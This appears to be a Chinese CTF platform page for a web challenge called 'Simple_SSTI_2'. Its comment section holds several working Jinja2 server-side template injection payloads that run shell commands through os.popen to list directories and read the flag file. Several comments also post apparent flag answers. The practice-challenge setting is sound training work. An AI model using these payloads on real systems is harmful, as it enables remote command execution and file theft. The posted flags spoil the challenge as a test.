Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15815
提  示:
描  述:
Simple_SSTI_2
评论
hxl223 1年前

flag{23de1e599ad6abcc6c446e355e72c807}

回复 1

nepw 1年前

通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件 通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 通过{{ config.__c

回复 1

DK2021 1年前

/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

回复 1

453137 2年前

flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

回复 0

earlyyue 2年前

/?flag={{lipsum.__globals__.os.popen('cat /app/flag').read()}}

回复 4

氕氘氚 2年前

flag{0c6e1431cbe4e002c413bcaa0e5dfa51}

回复 0

mcreterro 2年前

flag{e4b09223a5f6e916f2865c0548458616}

回复 0

T0ybox 2年前

flag{bced55366c4d2bffa9715f2563a2799b}

回复 0

Joyoo 2年前

flag{0c1223db987a466bc858703ed23bc157}

回复 0

Just play 2年前

没错 /?flag={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat flag').read()}}

回复 0

WriteUp

image
valecalida

5 金币

评分(15)

解题动态

YameMres 攻破了该题 23小时前
yixcjy 攻破了该题 3天前
DURUI 攻破了该题 3天前
零号酒仓 攻破了该题 3天前
besty2k 攻破了该题 4天前
zttyzz 攻破了该题 4天前
12334 攻破了该题 4天前
PY222 攻破了该题 4天前
魔刀千刃 攻破了该题 4天前
我是CTF大王 攻破了该题 4天前
16671766779 攻破了该题 5天前
海宝宝哈哈 攻破了该题 5天前
遇见遇见 攻破了该题 5天前
th0528 攻破了该题 6天前
/ 攻破了该题 6天前
15195388189 攻破了该题 6天前
18185185996 攻破了该题 11天前
KKsama 攻破了该题 11天前
zhuguangsen 攻破了该题 11天前
5013230204 攻破了该题 13天前
问题反馈